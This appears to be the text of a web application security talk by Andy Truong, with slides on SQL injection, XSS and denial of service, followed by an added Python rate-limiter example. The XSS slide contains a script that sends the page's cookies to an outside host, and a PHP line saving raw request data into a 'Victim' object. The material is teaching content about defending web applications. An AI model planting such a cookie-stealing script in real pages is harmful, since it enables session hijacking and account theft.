Web application

Security

ANDY TRUONG

Twitter: thehongtt

Email: andy at GO1.com.au

SQL Injection

XSS

<script>
jQuery.ajax({
    url: "http://security.php55.andy.p.go1.com.vn/xss.php",
    dataType: "jsonp",
    data: {cookie: window.document.cookie},
    success: function(response) {
        console.log( response );
    }
});
</script>
<?php (new Victim($_REQUEST))->save(); ?>

DDOS

Requests to slow, CPU-bound operations are not rate-limited:

  • Password hashing
  • Image manipulation
  • Text processing (Markdown, URL replace, …)
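An added example (not from the slides) of the mitigation for this slide: a per-client sliding-window limiter placed in front of an expensive handler, here a deliberately slow PBKDF2 password hash. The client key, limits and request trace are constructed for illustration; the limiter is checked before any slow work is done.

```python
import hashlib
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `limit` calls per `window` seconds for each client key."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock          # injectable so the trace below is deterministic
        self._hits = defaultdict(deque)

    def allow(self, key):
        now = self.clock()
        hits = self._hits[key]
        # Discard timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False            # over budget: reject without doing slow work
        hits.append(now)
        return True


def slow_password_hash(password, salt=b"constructed-salt"):
    # High-iteration PBKDF2 is CPU-expensive by design, which is exactly
    # why an unthrottled login endpoint is a denial-of-service target.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def handle_login(limiter, client_ip, password):
    """Return (status, body); the limit check runs BEFORE the expensive hash."""
    if not limiter.allow(client_ip):
        return 429, None
    return 200, slow_password_hash(password).hex()


# Constructed trace: (timestamp, client ip). One client bursts 8 requests,
# a second client sends one, then the first returns after the window moved.
SAMPLE_REQUESTS = [(float(i), "10.0.0.1") for i in range(8)] + [
    (7.5, "10.0.0.2"), (61.0, "10.0.0.1")]


def simulate(requests, limit=5, window=60.0):
    """Replay the trace against a fake clock and return the status codes."""
    current = [0.0]
    limiter = SlidingWindowLimiter(limit, window, clock=lambda: current[0])
    statuses = []
    for ts, ip in requests:
        current[0] = ts
        statuses.append(handle_login(limiter, ip, "hunter2")[0])
    return statuses
```

With the defaults the trace yields five 200s, three 429s for the burst, a 200 for the second client and a 200 once the oldest hits age out of the window.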


Tools

Your ideas
